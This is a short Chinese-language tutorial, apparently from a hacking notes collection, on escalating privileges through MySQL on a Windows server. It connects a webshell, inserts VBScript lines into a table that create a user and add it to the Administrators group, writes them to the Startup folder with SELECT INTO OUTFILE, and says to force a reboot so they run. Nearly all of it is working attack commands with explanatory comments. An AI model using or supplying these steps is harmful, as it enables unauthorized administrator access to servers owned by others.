数据库提权

mysql数据库启动项提权

1、先连接菜刀
mysql> create table a (cmd text); //创建表a，字段名字为cmd，以文本（text）的形式添加

Mysql>insert into a values (“set wshshell=createobject (“”wscript.shell””)”);//给cmd字段加括号里面的东西：

Mysql>insert into a values (“a=wshshell.run (“”cmd.exe /c net user lanbo lanbo /add”“,0)”);
//cmd.exe代表命令行，/c是没有回显，net user lanbo lanbo /add ,这个意思是加一个用户，也就是名字是lanbo，密码也是lanbo，””,0是断开的意思，和后面的

Mysql>insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup Administrators lanbo /add"",0)");
//这条语句的意思是将刚才创建的用户加到管理员组
注意双引号和括号以及后面的“0”一定要输入！我们将用这三条命令来建立一个VBS的脚本程序！

mysql>select * from a;//确认插入的东西是否正确

mysql>select * from a into outfile "c://docume~1//administrator//「开始」菜单//程序//启动//lanbo.vbs";
//在这个目录下创建一个名字为lanbo.vbs的启动项文件

最后通过一些手段使服务器重启，执行这个启动项文件